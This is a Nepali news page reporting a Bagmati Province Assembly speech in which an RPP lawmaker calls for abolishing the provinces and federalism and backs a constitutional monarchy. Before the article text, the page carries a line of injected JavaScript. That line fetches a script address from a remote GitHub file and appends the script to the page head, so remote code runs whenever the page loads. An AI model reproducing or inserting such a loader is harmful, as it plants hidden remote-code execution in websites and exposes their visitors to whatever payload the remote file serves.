;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ८,
हेटौंडा । बुधबार बसेको बागमती प्रदेश सभामा बौल्दै राष्ट्रिय प्रजातन्त्र पार्टीकी साँसद रिता माझीले मुलुकको आर्थिक समृद्धि चाहने हो भने धान्नै नसक्ने प्रदेश खारेज गरि यो अधिबेशनलाई अन्तिम अधिबेशन बनाउन शुभकामना दिएकि छिन् ।
सभामा बोल्दै साँसद माझीले गरिव, भोका, कोरोनाबाट पिडित जनताका लागि नभई पद, प्रतिष्ठा र कुर्सीको लागि राजनीतिक माहोल तातिनु राम्रो नभएको यसले अस्थिरता ल्याउने जिकिर गरिन ।
साँसद माझीले अहिलेको व्यवस्था सफल नभएको फेल भएको वताउँदै अवको विकल्प निरन्तरता सहितको परिवर्तनलाई संस्थागत गर्नुको विकल्प नभएको र सोको लागि संवैधानिक राजसंस्था रहेको वताइन ।
साँसद माझीले देशले धान्नै नसक्ने संघीयता खारेज गरी निर्वाचनको विकल्पमा जानु पर्ने वताईन ।
बैठकमा डोरमणी पौडेल, इन्द्र बानिया, अष्टलक्ष्मी शाक्य, रमेश पौडेल, रिना गुरुङ्ग,सुरेन्द्र राज गोसाईले शुभकामना राखेका थिए ।
फेसबुक प्रतिक्रियाहरु